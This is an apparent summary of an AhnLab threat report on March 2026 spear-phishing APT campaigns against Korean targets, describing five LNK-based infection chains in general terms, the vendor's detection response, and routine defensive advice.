Overview

ahnLab monitored APT attacks against domestic targets during the month of March 2026. most of the attacks were launched through Spear Phishing emails sent after reconnaissance of specific targets.

APT Attack Trends in Korea

the majority of distribution vectors were shortcut (.lnk) files, with LNK-based attacks dominating. Type A is to run PowerShell with LNK to download and execute the AutoIt malware with a copy of curl.exe and ensure persistence with Task Scheduler. Type B downloads the malicious HTA to %TEMP% with the default curl.exe and executes the decoy and sys.dll-based Infostealer-killer-memory-loaded backdoor. Type C creates a Base64-encoded script and downloads Decoy and additional scripts from GitHub to distribute XenoRAT family malware. Type D is a multi-stage execution of XML-VBS-PowerShell-BAT-Python to install a backdoor that allows remote command execution and file control. Type E uses JSE to create malicious DLLs and decoys in %ProgramData% and then memory loads the DLLs into regsvr32.exe to perform backdoor functions.

AhnLab Response Status

ahnLab is detecting and tracking a number of related samples by registering them as detection names and monitoring the threat group’s activities in ASEC. the report contains multiple file names, MD5 hashes, and malicious URLs/C2 domains, and there is a possibility of undetected variants.

Conclusion

the attack occurs through various formats disguised as legitimate documents and files, and ultimately leads to system control takeover and information exfiltration through backdoors, infostealers, keyloggers, etc. be cautious of emails and attachments from unknown sources, and keep your operating system, browser, and security products up-to-date to help mitigate the threat.